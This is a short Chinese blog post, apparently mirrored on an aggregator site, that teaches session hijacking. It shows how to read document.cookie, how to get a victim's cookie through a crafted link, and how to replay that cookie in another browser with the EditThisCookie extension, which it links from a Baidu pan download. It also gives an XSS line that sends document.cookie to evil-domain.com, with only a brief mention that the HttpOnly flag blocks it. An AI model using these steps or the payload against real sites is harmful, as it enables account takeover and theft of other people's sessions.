简单cookie入侵 - 走看看

zoukankan html css js c++ java

简单cookie入侵

在当前网站，按下F12键进入开发者模式，在console控制台输入：document.cookie获取cookie值如：

复制你得到cookie值，你或通过每种方式获取Cookie，例如：当别人点击你的链接时在参数后加&docment.cookie，

换一个浏览器，打开上面获得cookie的网站并点击EditThisCookie,将相应的key和值加入进去，刷新网页，就可以侵入成功了（注意 Cookie的有效期）

EditThisCookie是谷歌chrome的扩展插件，可以到Chrome扩展商店下载安装，如果不想翻墙则可以到以下下载完后将解压的文件拖进扩展程序即可：

https://pan.baidu.com/s/13lrP4aDXfIhCLCn2Fp217Q

new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
上面是跨站点载入的一个恶意脚本的代码，能够将当前网页的 Cookie 发往第三方服务器。如果设置了一个 Cookie 的HttpOnly属性，上面代码就不会读到该 Cookie

查看全文

相关阅读:
day1 UnicodeEncodeError: 'gbk' codec can't encode character 'xa0' in position 2490: illegal multibyte sequence 错误提示
 day2 Opencv + image
day1 Opencv安装 python 2.7 (32位)
2 oracle 实现上下键翻历史命令 rlwrap
Windows下安装RaibbitMQ
1. oracle12C的安装
 《万达哲学》------王健林
 MongoDB常用命令
 MongoDB让人恶心的配置
 MongoDB介绍及下载与安装

原文地址：https://www.cnblogs.com/jing-tian/p/10993814.html

Copyright © 2011-2022 走看看